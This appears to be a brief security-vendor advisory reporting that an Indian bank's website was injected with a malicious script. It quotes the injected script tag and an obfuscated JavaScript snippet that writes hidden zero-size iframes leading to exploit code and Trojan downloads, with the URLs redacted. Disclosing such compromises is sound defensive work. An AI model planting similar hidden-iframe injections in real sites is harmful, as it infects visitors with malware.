WebsenseĀ® Security LabsT has discovered that the official site for Indian Syndicate Bank (www.syndicatebank.in), was compromised with a malicious script that attempts to exploit multiple vulnerabilities. When customers visit the web site, a malicious JavaScript file (e.js) is executed and creates two additional iframes in the page.

<script src=http://< URL REMOVED >/e.js></script>

Snippet of js code:

document.writeln(“\/\/xxxx mca By Mr.0wen\/\/”);
document.writeln(“document.write(unescape(\”%3CIFraMe < URL REMOVED >IFraMe < URL REMOVED >wIdth%3D%220%22%20heIght%3D

%220%22%20FraMebOrder %3D%220%22%3E%3C\/IFraMe%3E\”));”);
document.writeln(“\/\/xxxx mca By Mr.0wen\/\/”);

The JavaScript from e.js (seen above) creates two new IFRAME elements within the page. One IFRAME attempts to load exploit code and the other creates several additional IFRAMEs that contain advertisement-related content. The exploit will try to load a Trojan Downloader (qq.exe) which will contact a remote server to download the following Trojan Downloader and Backdoor:

http://< URL REMOVED >/hxw/hx/200512.exe
http://< URL REMOVED >/hxw/hx/dd.exe

The site appears to have been cleaned a few hours ago.
Details …